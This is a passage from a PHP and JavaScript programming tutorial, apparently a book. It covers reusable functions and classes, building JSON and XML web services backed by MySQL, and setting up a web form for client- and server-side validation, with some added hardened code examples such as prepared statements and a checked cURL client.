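// privileges change so a pre-login ID cannot be reused afterwards.
function markLoggedIn($userId)
{
    session_regenerate_id(true);
    $_SESSION['userId'] = (int) $userId;
}

startHardenedSession();
```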


Using classes for efficiency

You learn about object oriented programming concepts in Book IV, Chapter 
4. One of the items discussed in that chapter is the concept of classes, which 
define a certain type of object. 
Classes can be used to provide shortcuts and helpers throughout
programming. For example, you might have a class to define a user. You can then
add functions (known as methods) to that user class for common things that
users might need to do, like update their passwords.

Without classes, you’d end up having numerous functions lying around in
your programs, possibly clashing with each other. Imagine the scenario (this
really happened) where you write a set of user management programs
without classes. These programs would include functions like changePassword,
addPermission, setEmail, and so on.

Now you want to merge that code with someone else’s to add the capability 
to use groups or roles into your program. Their programs are also written 
without classes, and they have some of the same function names as your 
programs, like addPermission. When you attempt to merge them, you’ll 
find no end to the confusion and function name collisions. By the time you get 
done merging the code, you could’ve just written it all from scratch again! 

On the other hand, if you define your programs using classes, then the
addPermission function (method) would never collide with another
function because the addPermission method is tied to the user class.

Recall that to create a user in an object oriented manner (called instantiating
a user object), you use the new keyword. For example, if your user class was
called User (for lack of a less descriptive term), you’d instantiate it like this:

$user = new User; 

Then when you call methods, you call them through your own copy of the 
user object, like this: 

$user->addPermission(); 

Now there can’t be a conflict because a group object would be called
something different.


Reusing Code 

One of the most important aspects of programming is code reuse. Many
programmers have sets of programs or functions that they frequently reuse, at
least as a starting point, to speed up their new projects. This section looks at 
a couple of techniques for code reuse in PHP, though these techniques apply 
conceptually to JavaScript and other languages, too! 




Using functions

Book IV, Chapter 2, touches on code reuse through functions. This section
expands on it, in light of your newfound knowledge of auto_prepend_file.
You can, with the help of an auto_prepend_file, create a functions
file that’s automatically included within all your PHP programs. These
functions might be something as simple as starting a session or as complex as an
entire login function.

Whenever you need, or think you need, a function in more than one
file, you can place it in an auto_prepend_file rather than using
require_once and include_once in each of those files.

Here’s an example of how you can reuse code through functions. One function 
that you might use in many places is something to convert a two-letter state 
abbreviation to its full name. You can create a function to do so and place it 
in the prepended PHP file. 

This exercise assumes that you’ve completed the preceding exercise to 
create a prepend.php file and have that file automatically loading through 
your web server. 

1. Open prepend.php from the preceding exercise.

2. Clear any code out of prepend.php and place the following code in
the file:

<?php

if (!isset($_SESSION)) {
    session_start();
}

function convertState($state) {
    $stateList = array(
        "AL" => "Alabama",
        "AK" => "Alaska",
        "AZ" => "Arizona",
        "AR" => "Arkansas",
        "CA" => "California",
        "CO" => "Colorado",
        "CT" => "Connecticut",
        "DE" => "Delaware",
        "FL" => "Florida",
        "GA" => "Georgia",
        "HI" => "Hawaii",
        "ID" => "Idaho",
        "IL" => "Illinois",
        "IN" => "Indiana",
        "IA" => "Iowa",
        "KS" => "Kansas",
        "KY" => "Kentucky",
        "LA" => "Louisiana",
        "ME" => "Maine",
        "MD" => "Maryland",
        "MA" => "Massachusetts",
        "MI" => "Michigan",
        "MN" => "Minnesota",
        "MS" => "Mississippi",
        "MO" => "Missouri",
        "MT" => "Montana",
        "NE" => "Nebraska",
        "NV" => "Nevada",
        "NH" => "New Hampshire",
        "NJ" => "New Jersey",
        "NM" => "New Mexico",
        "NY" => "New York",
        "NC" => "North Carolina",
        "ND" => "North Dakota",
        "OH" => "Ohio",
        "OK" => "Oklahoma",
        "OR" => "Oregon",
        "PA" => "Pennsylvania",
        "RI" => "Rhode Island",
        "SC" => "South Carolina",
        "SD" => "South Dakota",
        "TN" => "Tennessee",
        "TX" => "Texas",
        "UT" => "Utah",
        "VT" => "Vermont",
        "VA" => "Virginia",
        "WA" => "Washington",
        "WV" => "West Virginia",
        "WI" => "Wisconsin",
        "WY" => "Wyoming"
    );

    if (array_key_exists($state,$stateList)) {
        return $stateList[$state];
    } else {
        return false;
    }
} //end function convertState
Create a new file in your text editor and place the following code into the
editor:

<?php 

$stateAbbrev = "WI"; 

print "State abbreviation is " . $stateAbbrev . "<br>\n"; 

$stateFull = convertState($stateAbbrev); 
if ($stateFull) { 

print "Full name is " . $stateFull . "<br>\n"; 

} else { 

print "Full name not found for {$stateAbbrev}<br>\n"; 

} 

?> 

Save the file as state.php in your document root. Open a browser and
point to http://localhost/state.php. You should see a page like that
in Figure 1-3.


Figure 1-3: Loading the state.php PHP program.

The code in the prepend.php file first checks to see if the session has been 
started and starts the session, if necessary. Though it isn’t used in this file, 
it’ll be used elsewhere and builds on the example from earlier in the chapter. 
After that, it’s the typical creation of a function, which you see throughout 
the book. The function, called convertState, accepts an argument of the 
state to convert. The function sets up an array of the states and their full 
names. After that, the array_key_exists() PHP function is used to look
up the state. If the two-letter abbreviation doesn’t exist in the array, false 
is returned. Otherwise the name of the state is returned. 
The state.php file merely called the convertState function, which is
automatically “visible” or available because of the auto_prepend_file
directive that you already set up. If there’s a value in the $stateFull variable,
then it’s printed; otherwise, if there’s no value, as it would be if the value
was set to Boolean false (like it might be if no state was found), then a note
is printed to that effect.

This example demonstrates a simple but typical function that might be
commonly used across a web application built with PHP. By moving this function
into a file that’s included everywhere, you can use the function without
having to do any extra work, like requiring or including the function’s file,
wherever you want the function’s result.


Using object-oriented programming

Another way to promote code reuse is through object-oriented programming
(sometimes shortened to OOP). By using an abstract class, which you learn
about in Book IV, Chapter 4, you can reuse classes. Object-oriented
programming typically also means thinking more about the design of the programming
from a higher level, which means that your classes can be built to take
advantage of reuse.

An example of higher-level design promoting reuse is where you have
multiple classes that need to access user details. Rather than creating separate
methods in each of those classes, you can build a superclass or a third class
that provides those common methods. Doing so saves you from having to create
those same methods within each class.


Chapter 2: Creating and Using
a Web Service


In This Chapter 

Understanding web services 
Sharing data with web services 
Receiving web service data 


If you’ve read Book V, you’re already familiar with how to get data from a
MySQL database. To do so, you connect to the database, execute a query
to get some data, and then do something with the results.

Databases work great for most everything that you’ll build with your own 
site. But there are times when you need to access information outside of your 
own database. In these instances, you might be able to use (or consume) a 
web service offered by another company. For example, Twitter offers web 
services that enable you to retrieve tweets and other information, Amazon 
offers various web services, and several other companies offer public web 
services into their data. 

This chapter looks at how to create and consume web services. We start 
with a simple web service that returns the current date and then move into 
creating other web services that accept input. 


Understanding Web Services

When you grow your web site, you might find that you want to create web
services of your own, and then offer those to external sites or keep them for your own
use. Doing so means that people who want to access your data don’t need to
do so using MySQL. They can simply call your web service to get the data.

This greatly enhances security because you control what data is returned and 
how it’s returned, rather than someone querying your database directly. 

Web services return data in a couple different formats. PHP includes
formatting functions that make returning data from a web service almost trivial.

Web services typically return data formatted as Extensible Markup Language
(XML) or JavaScript Object Notation (JSON). JSON is a much less resource
intensive format, requiring less overhead to send data and incorporate it
into your programs.





One item of note with web services is that they don’t use sessions at all. You 
can, however, include variables from a session when calling a web service, 
but you can’t access any of them, as you see later in this chapter. 


Returning Data from a Web Service

Anything that you can return from a PHP program can be returned as a web 
service. This section looks at returning data in web service format. 

Returning the date 

A simple way to get your feet wet with web services is to return a date in 
JSON format. Here’s how you can do that: 

1. Open your text editor or programming IDE and create a new empty file.

2. Place the following code within the file:

<?php 

$header = "Content-Type: application/json"; 
header($header); 

$date = date("M d, Y"); 
print json_encode($date); 

?> 

3. Save the file as date.php in your document root.

4. View the page in your web browser at http://localhost/date.php.

You should see a page like that in Figure 2-1 (though the date will
probably be different).


Figure 2-1: Viewing a JSON-encoded date web service.
The format for this web service just returns the date as a quoted string. It’s
more common to return an array of data with each element labeled. The
labels make it easier to find and use individual elements. For example,
consider the code in Listing 2-1.


Listing 2-1: JSON-Encoded Data 

<?php 

$header = "Content-Type: application/json"; 
header($header); 

$date = date("M d, Y");

$returnData = array("friendlyDate" => $date); 
print json_encode($returnData); 

?> 

When viewed in a browser, the JSON-encoded data looks like that in Figure 2-2. 



As you can see, there’s now more to the returned data. This means that you 
can return all sorts of data with the same web service and the consumers 
of the web service can choose which pieces they’ll use. For example, the 
upcoming Listing 2-2 shows an enhanced date web service that returns the 
friendly date, the Unix time, the month, the day of the week, and the year in 
various formats. 

The examples shown so far (and others that create web services in this 
chapter) use the PHP header() function to send a Content-Type header
to the browser. The Content-Type header tells the browser what type of 
information is to be expected as output. It’s important for browsers so that 
they can parse the information properly. 
Listing 2-2: Returning Various Date Formats in a Web Service

<?php

$header = "Content-Type: application/json";
header($header);

$friendlyDate = date("M d, Y");
$unixTime = time();
$month = date("M");
$dayOfWeek = date("l");   // lowercase L: full name of the day of the week
$year = date("Y");

$returnData = array(
    "friendlyDate" => $friendlyDate,
    "unixTime" => $unixTime,
    "monthNum" => $month,
    "dayOfWeek" => $dayOfWeek,
    "yearNum" => $year
);

print json_encode($returnData);

?>

When viewed in a browser, the code from Listing 2-2 returns data like that in 
Figure 2-3. 



With that arraylike output, it’s easy to access individual elements. Say you
have an application that needs to know the day of the week. You can call
your web service and use the built-in json_decode() PHP function to get
access to the dayOfWeek element. Listing 2-3 shows code to consume a web
service.
Listing 2-3: Consuming a Web Service

<?php

$curlHandle = curl_init("http://localhost/date.php");
curl_setopt($curlHandle, CURLOPT_HEADER, 0);
curl_setopt($curlHandle, CURLOPT_RETURNTRANSFER, 1);

$output = curl_exec($curlHandle);

$decoded = json_decode($output,TRUE);
print $decoded['dayOfWeek'];

?>

When this page is viewed in a browser, the output is simply the day of the
week. The code in Listing 2-3 uses the cURL library, which connects into PHP
through a set of powerful functions to interact with web pages and sites,
including submitting forms. In this case, the code initializes the cURL object
(through curl_init()), sets some options, and then loads the URL.

The output is saved into a variable called $output, which is then decoded
using the json_decode() function. The Boolean true that you see within
the json_decode() function sets the output as an array, which is what you
want. Finally, the dayOfWeek is retrieved from the decoded output and
displayed to the screen.

This pattern is pretty typical of web service consumption. In fact, it’s 
common to set up a shared function or a class for cURL so that you can call 
cURL web services without having to include this same code in all your files. 
Chapter 1 of this minibook discusses including helper functions. 
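
One way to write the shared cURL function mentioned above, as an added example rather than the book's code: it checks the failure cases Listing 2-3 skips (transport error, non-200 status, wrong Content-Type, malformed JSON) and HTML-encodes the remote value before printing it. The names fetchJson and dayOfWeekFromService are hypothetical; the URL is the date.php service from this chapter.

```php
<?php
// Added example: shared JSON client for the date web service on this page.
// fetchJson() and dayOfWeekFromService() are hypothetical helper names.

function fetchJson($url, $timeoutSeconds = 5)
{
    $curlHandle = curl_init($url);
    if ($curlHandle === false) {
        throw new RuntimeException("Could not initialize cURL");
    }
    curl_setopt_array($curlHandle, array(
        CURLOPT_HEADER         => 0,
        CURLOPT_RETURNTRANSFER => 1,
        CURLOPT_FOLLOWLOCATION => 0,   // do not chase redirects to other hosts
        CURLOPT_PROTOCOLS      => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_CONNECTTIMEOUT => $timeoutSeconds,
        CURLOPT_TIMEOUT        => $timeoutSeconds,
    ));

    $output      = curl_exec($curlHandle);
    $curlError   = curl_error($curlHandle);
    $httpCode    = curl_getinfo($curlHandle, CURLINFO_HTTP_CODE);
    $contentType = (string) curl_getinfo($curlHandle, CURLINFO_CONTENT_TYPE);

    if ($output === false) {
        throw new RuntimeException("Request failed: " . $curlError);
    }
    if ($httpCode !== 200) {
        throw new RuntimeException("Unexpected HTTP status " . $httpCode);
    }
    if (stripos($contentType, "application/json") !== 0) {
        throw new RuntimeException("Unexpected Content-Type");
    }

    // A bare JSON string (as the first date.php returns) decodes to a PHP
    // string, not an array, and is rejected here.
    $decoded = json_decode($output, true);
    if (!is_array($decoded)) {
        throw new RuntimeException("Response is not a JSON object or array");
    }
    return $decoded;
}

function dayOfWeekFromService($url)
{
    $data = fetchJson($url);
    if (!isset($data["dayOfWeek"]) || !is_string($data["dayOfWeek"])) {
        throw new RuntimeException("dayOfWeek missing from response");
    }
    return $data["dayOfWeek"];
}

try {
    // Remote data is untrusted: encode it before it goes into an HTML page.
    $day = dayOfWeekFromService("http://localhost/date.php");
    print htmlspecialchars($day, ENT_QUOTES, "UTF-8");
} catch (RuntimeException $e) {
    error_log("date service: " . $e->getMessage());
    print "Date service unavailable";
}
```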

So what’s the advantage of calling a date web service instead of just simply
calling the date() function? That depends. On one hand, you could argue
that setting up a common date function that returns all sorts of formats is
easier than trying to remember the exact formatting for the date() function
everywhere you need it. On the other hand, you could say that calling a web
service might slow down the overall response time. Both are true and valid.

The date() function is used in this chapter primarily because it provides
an easy way to demonstrate returning data from a web service, without your
humble book authors having to explain too much about what the date()
function is doing.

Returning web service data from a database

A frequent use of web services is to retrieve information from a database. 
This section looks at returning simple data from a database. Later sections 
in this chapter show how to accept input and query the database through a 
web service. 
Creating the database

For this section, you use a database that marks whether or not a certain 
website is up and operational. The web service then simply returns “Up” or 
“Down” based on the contents of the database table. 

You use a database called sites for this section. Therefore, the first step is
to create the database itself, with the command:

mysqladmin -u <yourUser> -p create sites

The <yourUser> in that command would be the user that you have that can 
create databases. If you’re using a shared hosting provider, you might not 
be able to create databases. If that’s the case, then you can use whatever 
database the hosting provider has created for you. If you’re using a MySQL 
server on your local computer, then the user is probably called root. 

The database table will be called siteStatus and the create statement 
for it is as follows: 

CREATE TABLE siteStatus (
    id INT NOT NULL PRIMARY KEY AUTO_INCREMENT,
    siteURL VARCHAR(255),
    siteStatus VARCHAR(10)
);

You can enter that SQL into the MySQL Command Line Interface (CLI) to
create the table. Be sure to connect to or use the sites database when
creating the table, with the command:

CONNECT sites; 

or 

USE sites; 

Once the database has been created, a single row can be added for this
demonstration:

INSERT INTO siteStatus (siteURL,siteStatus) VALUES ('http://www.braingia.org','Up');


Creating the web service

The web service is created by setting up the MySQL connection, querying 
the database, and then returning the data. Of course, there’s also error 
handling, in case something goes wrong with the query. 

Listing 2-4 shows the code for creating this web service. 
Listing 2-4: A Web Service That Uses Data from a Database Query

<?php

$header = "Content-Type: application/json";
header($header);

$dbLink = mysqli_connect('localhost','USER','PASSWORD','sites');

if (!$dbLink) {
    $row = array("siteStatus" => "Database Error");
    print json_encode($row);
} else {
    $query = "SELECT siteStatus FROM siteStatus WHERE siteURL = 'http://www.braingia.org'";

    if ($result = mysqli_query($dbLink,$query)) {
        $row = $result->fetch_array(MYSQLI_ASSOC);
        if (is_null($row)) {
            $row = array("siteStatus" => "Error - Site Not Found");
        }
    } else {
        $row = array("siteStatus" => "General Error");
    }

    print json_encode($row);
    mysqli_close($dbLink);

} // End else condition (for database connection)

?>

The code from Listing 2-4 contains a good amount of error handling,
including error handling if the database connection can’t be established, if there’s a
problem with the query, or if the site wasn’t found. In all these cases, the end
result is that output is sent to the user thanks to the json_encode($row).

This is an important point with web services: Send output back to the web 
service consumer indicating that there was an error, rather than merely 
exiting. 

You should always include feedback in the output of the web service for error 
conditions so that the person calling the web service can handle the error. 

Figure 2-4 shows the output from this web service for non-error conditions. 
Figure 2-4: Returning the status of a site from a web service.
Up until this point, the web services you’ve created have simply returned
data but haven’t accepted any input of their own. You can add the capability 
to accept input and then react based on that input, much like you’d do for a 
web form. For example, you might accept input to the date web service to 
convert a date into other formats, or you might accept a URL into the site 
status web service to check its status. This section examines accepting 
input to a web service. 

Prior to accepting input, you should understand a bit about two HyperText 
Transfer Protocol (HTTP) methods. HTTP methods are ways of interacting 
with a web server. Here are two primary methods used on the web: 

♦ GET: This request sends everything right along with the URL, and you
see GET requests in the address bar of your web browser. GET requests
are limited by web browsers to a certain length (the length varies
depending on the browser).

♦ POST: These requests send data as part of the data that gets sent to the
server behind the scenes. POST requests are not limited by the web
browser and are therefore appropriate for long forms or for sending
large files through the web.


Querying with input data

Web services can accept input from a GET or a POST. For the purposes here,
you use a GET request to accept a URL for your site status web service.

Listing 2-5 shows the new site status web service, with code added to 
retrieve the URL from the query string. 
Listing 2-5: Retrieving the URL

<?php

$header = "Content-Type: application/json";
header($header);

if (isset($_GET['siteURL'])) {
    $site = $_GET['siteURL'];
} else {
    print json_encode(array("siteStatus" => "No site specified"));
    exit;
}

$dbLink = mysqli_connect('localhost','USER','PASSWORD','sites');

if (!$dbLink) {
    $row = array("siteStatus" => "Database Error");
    print json_encode($row);
} else {
    // Escape the user-supplied value before placing it in the query
    $escSite = mysqli_real_escape_string($dbLink,$site);

    $query = "SELECT siteStatus FROM siteStatus WHERE siteURL = '{$escSite}'";

    if ($result = mysqli_query($dbLink,$query)) {
        $row = $result->fetch_array(MYSQLI_ASSOC);
        if (is_null($row)) {
            $row = array("siteStatus" => "Error - Site Not Found");
        }
    } else {
        $row = array("siteStatus" => "General Error");
    }

    print json_encode($row);
    mysqli_close($dbLink);

} // End else condition (for database connection)

?>

The primary code addition for this new web service is at the top:

if (isset($_GET['siteURL'])) {
    $site = $_GET['siteURL'];
} else {
    print json_encode(array("siteStatus" => "No site specified"));
    exit;
}

This code checks to see if the siteURL variable is on the query string and if 
it is, sets it to the $site variable. 
Later in the code, the $site variable is escaped so that it’s safe to use in a
query, and the query itself is changed to use that newly escaped variable:

$escSite = mysqli_real_escape_string($dbLink,$site);

$query = "SELECT siteStatus FROM siteStatus WHERE siteURL = '{$escSite}'";

With that code in place, the web service can be called again. This time,
though, instead of just loading the web service like
http://localhost/sitestatus.php, you need to include the URL to check as
part of the address, like so:

http://localhost/sitestatus.php?siteURL=http%3A%2F%2Fwww.braingia.org

But wait! What’s all that %3A%2F%2F in the http://www.braingia.org URL?
Those are URL-encoded characters. Certain characters are reserved or
restricted from use in a URL. It just so happens that :// are some of those
restricted characters. Therefore, they need to be converted (or escaped) to
be a safe URL to use.

In any event, when that URL is loaded, the site is looked up in the database 
and its status is returned. 
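
The manual escaping recommended with mysqli_real_escape_string earlier and used in Listing 2-5 is safe only while every value is escaped and quoted; a bound parameter removes that dependency. The following version of sitestatus.php is an added example, not the book's listing. It assumes the sites database and siteStatus table from this chapter and the USER and PASSWORD placeholders of Listing 2-5; respond, validSiteURL, and lookupStatus are hypothetical names.

```php
<?php
// sitestatus.php with a bound parameter: added example, not the book's listing.
// Assumptions: the sites database and siteStatus table from this chapter;
// USER and PASSWORD are placeholders, as in Listing 2-5.

function respond($httpCode, $status)
{
    http_response_code($httpCode);
    header("Content-Type: application/json");
    print json_encode(array("siteStatus" => $status));
    exit;
}

// Returns the URL if it is a plausible http(s) URL, otherwise null.
// ?siteURL[]=x arrives as an array, so the type is checked first.
function validSiteURL($input)
{
    if (!is_string($input) || strlen($input) > 255) {   // column is VARCHAR(255)
        return null;
    }
    if (filter_var($input, FILTER_VALIDATE_URL) === false) {
        return null;
    }
    $scheme = strtolower((string) parse_url($input, PHP_URL_SCHEME));
    return in_array($scheme, array("http", "https"), true) ? $input : null;
}

// Returns the stored status, or null when the site is not in the table.
function lookupStatus($dbLink, $site)
{
    // The ? placeholder is sent separately from the SQL text, so the value
    // can never be parsed as part of the statement.
    $stmt = $dbLink->prepare(
        "SELECT siteStatus FROM siteStatus WHERE siteURL = ?");
    $stmt->bind_param("s", $site);
    $stmt->execute();
    $stmt->bind_result($status);
    $found = $stmt->fetch();   // true = row fetched, null = no row
    $stmt->close();
    return $found ? $status : null;
}

$site = validSiteURL(isset($_GET["siteURL"]) ? $_GET["siteURL"] : null);
if ($site === null) {
    respond(400, "No valid site specified");
}

// Make every mysqli failure throw, so one catch block handles them all.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);
try {
    $dbLink = mysqli_connect("localhost", "USER", "PASSWORD", "sites");
    $status = lookupStatus($dbLink, $site);
    mysqli_close($dbLink);
} catch (mysqli_sql_exception $e) {
    error_log("sitestatus: " . $e->getMessage());   // detail stays in the server log
    respond(500, "Database Error");
}

if ($status === null) {
    respond(404, "Error - Site Not Found");
}
respond(200, $status);
```

The JSON body keeps the siteStatus key from Listing 2-5, so existing consumers still parse it; the HTTP status code is an extra signal for callers that check it.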

Returning XML results 

Up until this point, you’ve been returning results in JSON format. Sometimes 
you might want to return results in XML format. You might do this because 
the consuming program for your web service can handle XML easier than 
JSON or because the person requesting the web service just wants XML. 

Listing 2-6 shows the date web service with XML output instead of JSON. 


Listing 2-6: XML Output for the date Web Service 

<?php

$friendlyDate = date("M d, Y","1369739047");
$unixTime = 1369739047;
$month = date("M","1369739047");
$dayOfWeek = date("l","1369739047");
$year = date("Y","1369739047");

$returnData = array(
    "friendlyDate" => $friendlyDate,
    "unixTime" => $unixTime,
    "monthNum" => $month,
    "dayOfWeek" => $dayOfWeek,
    "yearNum" => $year
);

$xml = new DOMDocument();

$dateInfoElement = $xml->createElement("dateinformation");
foreach ($returnData as $key => $value) {
    $xmlNode = $xml->createElement($key, $value);
    $dateInfoElement->appendChild($xmlNode);
}

$xml->appendChild($dateInfoElement);

$header = "Content-Type:text/xml";
header($header);
print $xml->saveXML();


The primary change for the web service is to create an XML document.
This is done through the DOMDocument object, which is part of PHP. With a
new DOMDocument object instantiated, the next step is to create XML elements
for each of the parts that you want to return. Wrap the elements inside a
parent element called dateinformation. Doing so keeps the XML formatted
properly.

The actual data for output is easy to make into XML. Because you have an 
array of date elements already, you can loop through that with a foreach()
loop and run the createElement and appendChild methods. 

The end result of your efforts is XML that looks like this: 

<dateInformation>
    <friendlyDate>May 28, 2013</friendlyDate>
    <unixTime>1369739047</unixTime>
    <monthNum>May</monthNum>
    <dayOfWeek>Tuesday</dayOfWeek>
    <yearNum>2013</yearNum>
</dateInformation>

Returning JSON and XML

You now know how to return JSON data and how to return XML data. However, 
doing so means that you need to choose which one you want at programming 
time, and that can never change unless you reprogram the output. The world 
would be a better place if you could return both XML and JSON, depending 
on what the calling program wants. 

Accomplishing this feat is a matter of accepting input for the web service 
and then providing appropriate output. Listing 2-7 provides the code for this 
web service. 




Listing 2-7: XML and JSON date Web Service 

<?php

if (isset($_GET['format'])) {
    $format = $_GET['format'];
    // Anchored so that only the exact strings json or xml are accepted
    if (!preg_match('/^(json|xml)$/',$format)) {
        print "Please choose a format: json or xml";
        exit;
    }
} else {
    print "Please choose a format: json or xml";
    exit;
}

$friendlyDate = date("M d, Y");
$unixTime = time();
$month = date("M");
$dayOfWeek = date("l");
$year = date("Y");

$returnData = array(
    "friendlyDate" => $friendlyDate,
    "unixTime" => $unixTime,
    "monthNum" => $month,
    "dayOfWeek" => $dayOfWeek,
    "yearNum" => $year
);

if ($format == "xml") {
    $xml = new DOMDocument();
    $dateInfoElement = $xml->createElement("dateinformation");
    foreach ($returnData as $key => $value) {
        $xmlNode = $xml->createElement($key,$value);
        $dateInfoElement->appendChild($xmlNode);
    }
    $xml->appendChild($dateInfoElement);
    $output = $xml->saveXML();
    $header = "Content-Type:text/xml";
} else if ($format == "json") {
    $output = json_encode($returnData);
    $header = "Content-Type:application/json";
}

header($header);
print $output;

?>

It may be helpful to break this code down. The first part of the code looks for
the format to be sent back:

if (isset($_GET['format'])) {
    $format = $_GET['format'];
    if (!preg_match('/^(json|xml)$/',$format)) {
        print "Please choose a format: json or xml";
        exit;
    }
} else {
    print "Please choose a format: json or xml";
    exit;
}

If a GET parameter of format is available, it’s assigned to the $format
variable. This variable is tested using the preg_match() function. This
function uses a regular expression to check that the format parameter is set
to json or xml (lowercase). The ^ and $ anchors make the pattern match the
whole value rather than any string that merely contains json or xml. If the
value doesn’t match, an error is displayed, as is the case if the format
parameter is not set at all.

From there, the code performs the same functions that you’ve seen already, 
obtaining the date in various formats and placing them into an array. Finally, 
the code sets up a conditional based on the requested format. If it’s XML,
then the XML-related code is executed; if the requested format is JSON, then 
the JSON-related code is executed. Finally, the output is sent to the browser. 

Chapter 3: Validating Web Forms with JavaScript and PHP


In This Chapter 

♦ Considering important web form validation issues
♦ Using JavaScript validation
♦ Using PHP validation


When you put a web form out on the Internet, you’re inviting people
to send you information. Unfortunately, not everyone fills out web
forms correctly; some people don’t know how the phone number should be
formatted or whether to use a five-digit or nine-digit ZIP code. In addition to
basic mistakes, there are also malicious users who fill out forms incorrectly
to see if they can get your program to break or if they can access data that
they shouldn’t.


Regardless of the reason why forms might be filled out with incorrect
information, it’s up to you, the developer, to make sure that the data is
formatted correctly prior to acting on it. For example, if someone fills out a
form with letters instead of numbers for a ZIP code, chances are that you want
to return some type of error message to have that user fix the issue.

This chapter tells you what important items to consider when you’re deciding
how to validate your web forms, how to set up JavaScript validation and
provide feedback to form users, and how to validate user input on the
server side.


Understanding How to Validate Web Forms

Form validation is the process by which you examine the data from a web 
form to make sure it’s the correct and expected data in the right format. 
There are two general types of validation, client-side and server-side. 

♦ Client-side validation typically occurs with JavaScript right within the 
visitor’s web browser. 

♦ Server-side validation occurs in the code running on the server, in this 
case, the PHP code. 

The first section of this chapter looks at some high-level items that you
should consider when validating web forms. Some of them are obvious, while 
others are overlooked by experienced programmers and newbies alike. 

Always assume bad data

Rule #1 in programming is to always assume that the data you’re receiving is 
incorrect and only after it’s been proven correct should it be used. Working 
with this assumption greatly simplifies your task as a programmer. With 
this assumption, you no longer need to try to think of every way that a user 
could break your program. Rather, you merely need to think about the
correct way to use it, and then make sure that your version of correctness is
being followed. 


Never assume JavaScript

A mistake made by new and experienced programmers alike is to assume that 
JavaScript will be enabled in the visitor’s browser. With that assumption, 
the programmers perform their validation in JavaScript and only do minimal 
validation in PHP, where it really counts. Unfortunately, JavaScript may not 
always be available, and even when it is, malicious users can still send bad 
data to the server by skipping the JavaScript checks. No amount of
triple-extra checking to make sure JavaScript is enabled will help with that.



The only solution is to never assume that JavaScript validation has occurred 
at all and always perform rigorous validation in PHP. Once the data gets into 
PHP, the user no longer controls it and the number of things that can go 
wrong decreases. 


Sometimes mirror client- and server-side validation

When you implement a check in JavaScript, for example, to make sure that a 
ZIP code is five digits, that same type of check should also be added to the 
PHP code. Obviously, keeping these in sync can become a bit cumbersome, 
and there are certain times when a validation check might not be appropriate 
on the client side. For example, a website visitor’s selection from a drop-down 
for state (a menu that includes Arizona, California, Wisconsin, and so on) 
probably doesn’t need to be checked in the JavaScript, but it definitely does 
need to be checked in the PHP code. 


As a general rule, though not always, you mirror the validation logic
between JavaScript and PHP.


Performing Basic JavaScript Validation

This section looks at basic validation using JavaScript for a variety of input 
types. This first exercise sets up the HTML for the web form. Once you
complete this exercise and this section, you’ll have JavaScript validation done
for the form. 


1. Open your text editor and create a new empty file. 

2. Within the file, place the following HTML: 

<!doctype html>

<html> 

<head> 

<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js"></script>

<script type="text/javascript" src="form.js"></script> 
<link rel="stylesheet" type="text/css" href="form.css"> 
<title>A form</title> 

</head> 

<body> 

<form id="userForm" method="POST" action="form-process.php">

<div> 

<fieldset> 

<legend>User Information</legend> 

<div id="errorDiv"></div> 

<label for="name">Name:* </label>

<input type="text" id="name" name="name"> 

<span class="errorFeedback errorSpan" 
id="nameError">Name is required</span> 

<br /> 

<label for="city">City: </label> 

<input type="text" id="city" name="city"> 

<br /> 

<label for="state">State: </label> 

<select name="state" id="state"> 
<option></option> 

<option>Alabama</option> 

<option>California</option> 
<option>Colorado</option> 
<option>Florida</option> 
<option>Illinois</option> 

<option>New Jersey</option> 

<option>New York</option> 
<option>Wisconsin</option> 

</select> 

<br /> 

<label for="zip">ZIP: </label> 
<input type="text" id="zip" name="zip">
<br />
<label for="email">E-mail Address:* </label>
<input type="text" id="email" name="email">
<span class="errorFeedback errorSpan" id="emailError">E-mail is required</span>
<br />
<label for="phone">Telephone Number: </label>
<input type="text" id="phone" name="phone">
<span class="errorFeedback errorSpan" id="phoneError">Format: xxx-xxx-xxxx</span>
<br />
<label for="work">Number Type:</label>
<input class="radioButton" type="radio" name="phonetype" id="work" value="work">
<label class="radioButton" for="work">Work</label>
<input class="radioButton" type="radio" name="phonetype" id="home" value="home">
<label class="radioButton" for="home">Home</label>
<span class="errorFeedback errorSpan phoneTypeError" id="phonetypeError">Please choose an option</span>
<br />
<label for="password1">Password:* </label>
<input type="password" id="password1" name="password1">
<span class="errorFeedback errorSpan" id="password1Error">Password required</span>
<br />
<label for="password2">Verify Password:* </label>
<input type="password" id="password2" name="password2">
<span class="errorFeedback errorSpan" id="password2Error">Passwords don't match</span>

<br /> 

<input type="submit" id="submit" name="submit"> 
</fieldset> 

</div> 

</form> 

</body> 

</html> 

3. Save the file as form.php in your document root. 

4. View the file in your web browser by going to http://localhost/form.php.

You should see a page like that in Figure 3-1. 

The HTML looks pretty bad, with misaligned form fields and errors 
displaying. You can fix that with CSS. 

Figure 3-1: A web form for validation.

5. Create a new text file in your editor and enter the following CSS:

form fieldset { 

display: inline-block; 

} 

.radioButton { 

float: none; 
display: inline; 
margin-right: 0.1em;
width: 2em; 

} 

form label { 

width: 8em; 
margin-right: 1em;
float: left; 
text-align: right; 
display: block; 

} 

form input { 

width: 15em; 

} 

#submit { 

margin-top: 2em; 
float: right; 

} 

.errorClass { 

background-color: #CC6666; 

} 


#errorDiv { 
color: red;

} 

.errorFeedback { 

visibility: hidden; 

} 


6. Save the file as form.css in your document root.

This file was already referenced in the HTML that you created in Step 2, 
so no other changes are necessary to that file. 

7. Reload the form.php file in your browser. 

The form should now look like that in Figure 3-2. 


Figure 3-2: The form with CSS added.



With the HTML and CSS in place, it’s time to add some JavaScript. Note: 
You build the validation code later in this chapter. For now, you just add 
a basic JavaScript file. 

8. Create a new text file in your editor. 

9. Place the following JavaScript in the file. 

$(document).ready(function() { 

alert("hello"); 

}) ; 

10. Save the file as form.js in your document root.

11. Reload form.php in your web browser.

You should receive an alert dialog like the one shown in Figure 3-3. 

Figure 3-3: An alert from JavaScript.


12. Click OK to dismiss the dialog. 

While the alert dialog itself is nothing new, it proves that you’ve connected 
the HTML and JavaScript correctly for this exercise. From here, you work on 
adding JavaScript validation to the form. Prior to doing so, you may find it 
helpful to break down some of the HTML and CSS that you’ve created. 

Looking at the form HTML and CSS 

The HTML used for the form is standard (and valid) HTML5. It begins by 
referencing some external files, including a Cascading Style Sheet (CSS) file 
and two JavaScript files. 

<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js"></script>
<script type="text/javascript" src="form.js"></script>
